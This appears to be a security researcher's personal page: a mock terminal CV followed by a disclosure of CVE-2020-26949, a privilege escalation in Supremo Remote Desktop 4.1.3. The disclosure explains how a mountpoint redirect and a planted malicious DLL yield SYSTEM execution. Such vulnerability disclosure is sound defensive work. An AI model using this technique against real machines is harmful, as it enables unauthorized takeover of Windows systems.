$ ./rce.sh
[+] Checking credentials: Anders Kusk
[+] OSCP Cert loaded
[+] OSCE Cert loaded
[+] Parsing cv.bin
0x00002007: 4461 6e69 7368 2050 6f6c 6963 652c 204f 6666 6963 6572 2020 2020 2020 2020 200a Danish Police, Officer .
0x00002018: 5444 432c 2049 6e74 6572 6e61 6c20 5065 6e74 6573 7465 7220 2020 2020 2020 200a TDC, Internal Pentester .
0x00002019: 496d 7072 6f73 6563 2c20 5365 6375 7269 7479 2041 6476 6973 6f72 2020 2020 200a Improsec, Security Advisor .
[=] Loading externals
-> mutt -s "Hello" a@rce.sh < /dev/null
-> curl -v https://www.linkedin.com/in/anders-kusk
-> curl -v https://github.com/kusk/
-> curl -v https://www.hackthebox.eu/profile/9409
-> curl -v https://twitter.com/anderskusk
^C
$ echo return to root
$ cat ./cve/CVE-2020-26949 - Supremo Remote Desktop Privilege escalation.md

CVE-2020-26949 - Supremo Remote Desktop Privilege escalation

Affected product and version: Supremo Remote Desktop version 4.1.3

Fixed version: Supremo Remote Desktop version 4.2.0

Website: https://www.supremocontrol.com

Assigned CVE: CVE-2020-26949

A quick privesc vulnerability I found in a small remote desktop application called Supremo.

Supremo runs a service executable from "C:\Program Files (x86)\Supremo\SupremoService.exe" in the context of "NT Authority/SYSTEM". Supremo also has en small tray application where the application can be controlled and configured.

If an user exits the tray application, the executable "Supremo.exe"(running as NT Authority/SYSTEM) will restart and during this restart it will delete the directory "C:\Windows\Temp\Supremo.madExcept" and all files and directories inside.

After this the "Supremo.exe" executable will load a DLL called "openh264-win32.dll" from "C:\Windows\Temp\Supremo\[USER ID]\". The permissions for the DLL-file only allows for low privilege users to read it. However its parent directory allows all users to create new files.

By using James Forshaw symboliclinktestingtools and manually creating the "Supremo.madExcept" and thereafter creating a mountpoint from "C:\Windows\Temp\Supremo.madExcept" to "C:\Windows\Temp\Supremo\[USERID]", we could force the "Supremo.exe" executable to delete the "openh264-win32.dll" and quickly replace it with our own malicious..

Malicious DLL executing a "cmd.exe /c whoami > C:\pwn.txt" as NT Authority/SYSTEM.